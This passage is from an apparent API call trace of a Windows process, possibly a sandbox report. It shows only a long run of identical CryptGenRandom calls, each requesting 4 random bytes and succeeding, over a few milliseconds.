hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.166] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.167] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.168] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 